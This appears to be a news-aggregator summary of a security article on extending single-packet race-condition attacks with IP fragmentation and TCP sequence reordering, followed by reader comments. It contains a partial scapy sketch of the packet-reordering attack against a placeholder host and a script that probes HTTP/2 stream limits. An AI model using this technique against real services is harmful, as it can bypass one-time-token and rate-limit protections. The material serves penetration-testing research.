August 5th, 2024

Single-packet race condition breaking the 65535 byte lim

A Flatt Security article describes a method that extends the single-packet race-condition attack past its roughly 1,500-byte limit using IP fragmentation and TCP sequence number reordering, making limit-overrun vulnerabilities such as one-time-token bypasses easier to exploit.

A recent article by RyotaK from Flatt Security discusses advancements in exploiting single-packet race conditions, specifically addressing the limitation of the traditional single-packet attack, which is restricted to roughly 1,500 bytes by the network MTU. The author introduces a method to extend this limit using IP fragmentation and TCP sequence number reordering, allowing much larger batches of requests to be sent simultaneously. Oversized TCP segments are split across multiple IP fragments, and the segment carrying the first sequence number is withheld until last, so the server buffers the out-of-order data and processes it all at once when that final piece arrives. This enables the exploitation of vulnerabilities such as authentication bypass in one-time-token systems.
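
The core ordering trick can be sketched with scapy (an assumption; the article's actual tooling is not described here). The target address, ports, and sequence numbers below are placeholders, and the TCP handshake and HTTP/2 framing are omitted, so this only illustrates the idea of withholding the first-sequence bytes:

    # Minimal sketch of the reordering idea (not the author's actual tool): build one
    # oversized TCP segment, IP-fragment it, send everything except the bytes at the
    # first sequence number, then release that first piece last so the server's TCP
    # stack hands all buffered data to the application at (nearly) the same moment.
    from scapy.all import IP, TCP, Raw, fragment, send

    DST, DPORT, SPORT = "192.0.2.10", 80, 40000   # placeholder target and ports
    SEQ0 = 1000                  # would be the real sequence number after the handshake
    payload = b"A" * 60000       # stand-in for a large batch of pipelined requests

    first, rest = payload[:1], payload[1:]

    # The bulk of the data, starting one byte past the first sequence number.
    rest_seg = IP(dst=DST) / TCP(sport=SPORT, dport=DPORT, flags="PA",
                                 seq=SEQ0 + len(first)) / Raw(rest)
    # The single byte that carries the first sequence number.
    first_seg = IP(dst=DST) / TCP(sport=SPORT, dport=DPORT, flags="PA",
                                  seq=SEQ0) / Raw(first)

    # Split the oversized segment into MTU-sized IP fragments and send them; the
    # receiver buffers the data but cannot deliver it while a hole remains at SEQ0.
    for frag in fragment(rest_seg, fragsize=1400):
        send(frag, verbose=False)

    # Releasing the first-sequence byte last closes the hole and triggers processing
    # of everything buffered so far at once.
    send(first_seg, verbose=False)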

The article outlines the mechanics of the attack, demonstrating that it is possible to send 10,000 requests in approximately 166 milliseconds, significantly improving upon previous methods. However, the effectiveness of this approach is contingent on server configurations, particularly the SETTINGS_MAX_CONCURRENT_STREAMS setting in HTTP/2, which limits the number of simultaneous requests. The author notes that while modern servers typically have sufficient buffer sizes, the attack's success may vary based on the server's implementation of HTTP/2.
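
As a rough illustration of that constraint, a server's advertised stream limit can be read from its initial SETTINGS frame. The sketch below assumes the Python h2 package and a cleartext h2c endpoint with a placeholder hostname; real targets usually require TLS with ALPN, and this is not necessarily how the author measured it:

    # Rough sketch: open a prior-knowledge HTTP/2 (h2c) connection and report the
    # server's SETTINGS_MAX_CONCURRENT_STREAMS, which caps how many requests can be
    # packed into one synchronized burst.
    import socket

    import h2.connection
    import h2.events
    import h2.settings

    HOST, PORT = "target.example", 80          # placeholder endpoint

    sock = socket.create_connection((HOST, PORT), timeout=5)
    conn = h2.connection.H2Connection()
    conn.initiate_connection()
    sock.sendall(conn.data_to_send())

    limit = None
    for _ in range(10):                        # the SETTINGS frame arrives early
        data = sock.recv(65535)
        if not data:
            break
        for event in conn.receive_data(data):
            if isinstance(event, h2.events.RemoteSettingsChanged):
                changed = event.changed_settings.get(
                    h2.settings.SettingCodes.MAX_CONCURRENT_STREAMS)
                if changed is not None:
                    limit = changed.new_value
        sock.sendall(conn.data_to_send())      # e.g. the SETTINGS ACK
        if limit is not None:
            break

    print("SETTINGS_MAX_CONCURRENT_STREAMS:",
          "not advertised (unlimited by default)" if limit is None else limit)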

Further improvements are suggested, including support for HTTPS and better integration with existing proxy tools. The article concludes by emphasizing the potential of the First Sequence Sync technique for exploiting limit-overrun vulnerabilities that are challenging to address with conventional methods, highlighting its value in security assessments and penetration testing.

Related

The Rise of Packet Rate Attacks: When Core Routers Turn Evil

Packet rate attacks, a new trend in DDoS attacks, overload networking devices near the target. OVHcloud faced attacks exceeding 100 Mpps, some from MikroTik Routers, prompting enhanced protection measures.

Beyond bufferbloat: End-to-end congestion control cannot avoid latency spikes

End-to-end congestion control methods like TCP and QUIC face challenges in preventing latency spikes, especially in dynamic networks like Wi-Fi and 5G. Suggestions include anticipating capacity changes and prioritizing latency-sensitive traffic for a reliable low-latency internet.

Threat actors quick to weaponize PoC exploits; 6.8% of all internet traffic DDoS

Hackers exploit PoC exploits within 22 minutes of release, leaving little time for defense. Cloudflare advises using AI for quick detection rules. DDoS attacks contribute to 6.8% of daily internet traffic, rising to 12% during major events.

Cloudflare reports almost 7% of internet traffic is malicious

Cloudflare's report highlights a rise in malicious internet traffic, driven by global events. It emphasizes the need for timely patching against new vulnerabilities, notes a surge in DDoS attacks, stresses API security, and warns about harmful bot traffic. Organizations are urged to adopt robust security measures.

OpenSSL bug exposed up to 255 bytes of server heap and existed since 2011

CVE-2024-5535 is a historical OpenSSL vulnerability allowing buffer overreads, affecting Python and Node.js versions up to 3.9 and 9, respectively. Users should review usage of `SSL_select_next_proto`.

9 comments
By @com - 9 months
Please don’t correct the title, it’s delightful as it is.
By @simiones - 9 months
It should be noted that IP fragmentation is quite limited and often buggy. IPv6 only requires receivers to re-assemble an IP packet that is at most 1500 bytes, so sending a 65KB TCP segment is quite likely to just result in dropped packets.

Alternatively, the 1500-byte limit is not a hard limit, and depends entirely on your link. Jumbo frames (~9000 bytes) and even beyond are possible if all the devices along the path are configured the right way. Additionally, IPv6 actually supports packets up to ~4 GiB in size (so-called "jumbograms", with an additional header), though I think it would be truly hard to find any network which uses this feature.
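
Whether a given link is actually set up for frames that large is easy to check locally; a Linux-only sketch using the SIOCGIFMTU ioctl (the interface name is a placeholder):

    # Query an interface's MTU to see whether the local link uses standard (1500)
    # or jumbo (~9000) frames. Linux-specific; uses the SIOCGIFMTU ioctl.
    import fcntl
    import socket
    import struct

    SIOCGIFMTU = 0x8921                        # Linux "get interface MTU" ioctl

    def get_mtu(ifname: str) -> int:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        ifreq = struct.pack("256s", ifname[:15].encode())
        mtu = struct.unpack("<i", fcntl.ioctl(s.fileno(), SIOCGIFMTU, ifreq)[16:20])[0]
        s.close()
        return mtu

    print(get_mtu("eth0"))                     # e.g. 1500, or ~9000 for jumbo frames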

By @wrs - 9 months
BTW, you don’t have to rent servers on opposite sides of the planet just to increase network latency for testing.

    tc qdisc add dev eth0 root netem delay 200ms
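    # adds 200 ms of artificial egress delay on eth0; remove it afterwards with:
    #   tc qdisc del dev eth0 root netem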
By @AstralStorm - 9 months
So, is this a DoS technique or what? Or is it trying to avoid TCP-side transmission rate limits, which should be implemented on the IP side anyway?
By @weissnick - 9 months
This technique is briefly discussed in chapter 5.3.1 of the master's thesis "Exploiting Race Conditions in Web Applications with HTTP/2" - https://ntnuopen.ntnu.no/ntnu-xmlui/handle/11250/2781157

The same thesis is also referenced by James Kettle in his research.

By @algesten - 9 months
I assume this would be less useful with HTTP/1.1, since each synchronized request would require its own socket, thus running into firewalls that limit the SYN/SYN-ACK rate and/or concurrent connections from the same IP.

In some respects this is abusing the exact reason we got HTTP/3 to replace HTTP/2 – it's deliberate Head-of-Line (HoL) blocking.

By @Out_of_Characte - 9 months
This title is about as apt as my username
By @tontonius - 9 months
"Its not clear why TCP settled on such an oddly specific number"